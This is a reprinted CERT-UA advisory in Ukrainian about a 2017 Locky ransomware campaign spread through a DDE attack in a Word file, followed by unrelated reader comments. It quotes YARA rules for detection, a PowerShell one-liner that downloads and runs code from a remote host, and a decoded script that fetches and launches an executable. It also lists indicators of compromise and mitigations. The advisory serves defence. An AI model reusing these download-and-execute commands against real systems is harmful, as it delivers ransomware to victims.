Отключить рекламу

Подпишитесь!


24.10.17
8364 11 Печатать

Кібератака. Розповсюдження шифрувальника Locky через DDE-атаку (попередній аналіз)

В атаці 24.10.2017 на деякі об’єкти інфраструктури України використовувалася техніка DDE, яка активовувала виконання шкідливого коду на комп’ютері користувача.

Команді CERT-UA було надіслано для аналізу файл:

Invoice_file_916096.doc

36170f61b5c6e2c311a379704329237d

https://www.virustotal.com/#/file/99b695b3d2ce9b0440ce7526fea59f7a4851d83d9a9d9a6cf906417068bc7524/community

Файл для подальшої експлуатації використовув DDE-вразливість (CVE-2017-11826)

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11826

Виявити DDE-атаку можливо за допомогою наступної YARA-сигнатури:

YARA rules Office DDE

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

rule Office_DDEAUTO_field {
strings:
$a = /.+?\b[Dd][Dd][Ee][Aa][Uu][Tt][Oo]\b.+?/
condition:
$a
}

 

rule Office_DDE_field {
strings:
$a = /.+?\b[Dd][Dd][Ee]\b.+?/
condition:
$a
}

 

rule Office_OLE_DDEAUTO {
strings:
$a = /\x13\s*DDEAUTO\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}

 

rule Office_OLE_DDE {
strings:
$a = /\x13\s*DDE\b[^\x14]+/ nocase
condition:
uint32be(0) == 0xD0CF11E0 and $a
}

 

В результаті активації користувачем ole-гіперпосилання активовувався powershell-скрипт:

cmd.exe /k powershell.exe -NonI -noexit -NoP -sta $sr=(new-object IO.StreamReader ((([Net.WebRequest]::Create(‘http://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream())).ReadToEnd();powershell.exe -e $sr (PID: 2872, Additional Context: new-object ((([Net.WebRequest]::Create(‘hxxp://urcho.com/JHGGsdsw6’)).GetResponse()).GetResponseStream()).ReadToEnd();;)

Даний скрипт підвантажував на систему користовувача закодовані base64-алгоритмом дані, а саме:

DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOgAvAC8AdABhAHQAaQBhAG4AYQBkAGUAY…

Результат декодування даних:

$urls = «http://tatianadecastelbajac.fr/kjhgFG»,»http://video.rb-webdev.de/kjhgFG»,»http://themclarenfamily.com/kjhgFG»
foreach($url in $urls){
Try
{
Write-Host $url 
$fp = «$env:temp\heropad64.exe» 
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
Write-Host $_.Exception.Message
}
}

 

Скрипт підвантажував на систему з одного з доступних на момент активації url адрес завантажувача з назвою heropad64.exe

(https://www.virustotal.com/ru/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/), який в подальшому підвантажував на комп’ютер користувача шифрувальника файлів Locky.

Файл heropad64.exe підвантажував шифрувальника файлів Locky з наступного url:

hxxp://webhotell.enivest.no/cuYT39.enc

Дані пізніше розшифровувалися та збиралися в MZ/PE файл (https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/)

Командно-контрольний центр шифрувальника:

hxxp://gdiscoun.org

Індикатори компрометації:

hxxp://urcho.com/JHGGsdsw6
hxxp://tatianadecastelbajac.fr/kjhgFG
hxxp://video.rb-webdev.de/kjhgFG
hxxp://themclarenfamily.com/kjhgFG
hxxp://webhotell.enivest.no/cuYT39.enc
hxxp://gdiscoun.org

Рекомендації CERTUA: 

  1. Заблокувати доступ до зазначених посилань.
  2. Встановити оновлення Windows, які усувають вразливість DDE в Microsoft Office (CVE-2017-11826).  (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11826)
  3. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).
  4. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.
  5. Не працювати під правами адміністратора.
  6. Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.
  7. Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.

Команда реагування на комп’ютерні надзвичайні події України CERT-UA Державної служби спеціального зв’язку та захисту інформації України працює цілодобово для надання консультацій та допомоги щодо усунення наслідків або попередження кібератаки з використанням шифрувальника файлів. тел. 281-88-25, 281-88-05, email: cert@cert.gov.ua

По материалам CERT-UA
Отключить рекламу
Комментарии
  • Шурик
25.10.17 07:22

Полиции Германии сообщили ? Чтобы заблокировали домен.

Ответить
    Оценить
  • 14
  • 0
  • 1963
25.10.17 09:31

Доброе всем утро. Как все интересно написано, нужно нам гл.бухам становиться потихоньку ай тишниками, или как? Это нам нужно между первичкой,НДС блокировкой,отчетами,ШЕФОМ, ДПИ,еще следить за атакой вирусов. Хочется взять узелок и уйти в туман,НО, или тумана нет ,или в узелок положить нечего. Вот так.

Ответить
    Оценить
  • 109
  • 0
  • Да
25.10.17 10:56

Типа показали как они класно работают ,а меня больше волнует что опять с нового года поднимают налоги. Что надоело столько времени тратить на регистрацию налоговых и гадать на ромашках заблокируют или нет . А еще больше что столько людей гибнет, а коррупция процветает. И еще не известно кто эти вирусы запускает, а то как в пословице , кто больше всех кричит ,держите вора. Достало уже все.

Ответить
    Оценить
  • 26
  • 0
  • Нет
25.10.17 12:05

Да, "а меня больше волнует что опять с нового года поднимают налоги" - а можно поподробней (конкретно какие налоги?)

Ответить
    Оценить
  • 0
  • 0
  • Да
25.10.17 12:11

Нет, Если подымается минимальная зарплата , то увеличиваются ЕСВ, для ФОП единщиков ЕСВ и единый налог.

Ответить
    Оценить
  • 2
  • 1
  • Нет
25.10.17 12:33

Да, Это происходит каждый код в течении последних ,,,,надцати лет. Пора бы привыкнуть и не волноваться по такой ерунде.

Ответить
    Оценить
  • 1
  • 6
  • Оля
25.10.17 11:33

Да,

Ответить
    Оценить
  • 0
  • 0
  • Оля
25.10.17 11:34

Да, вот и я так думаю... сами придумали вирусы, атаки, хворь , напасть и сами ее устранили)) и смешно и грустно((

Ответить
    Оценить
  • 11
  • 0
  • Мирра
25.10.17 12:00

А человеческим языком?????

Ответить
    Оценить
  • 1
  • 0
  • SHADOW
25.10.17 12:36

Мирра, перевожу..."дайте денег, нам мало . а хочется поехать на новый год отдохнуть на острова, машинку новую купить(старой уже год и не модная) и т.д."

Ответить
    Оценить
  • 11
  • 0
  • Постійний читач
25.10.17 18:02

А Х-дата, ванна-край і петя (вибачте за мову написання)До цих пір єаналіз фалів та виконуваних скриптів. Ту один вірус вивів з ладу тільки 2 організації - і таки аналіз. А коли в масштабах країни то повний 0

Ответить
    Оценить
  • 1
  • 0
Для того, чтоб распечатать текст необходимо авторизоваться или зарегистрироваться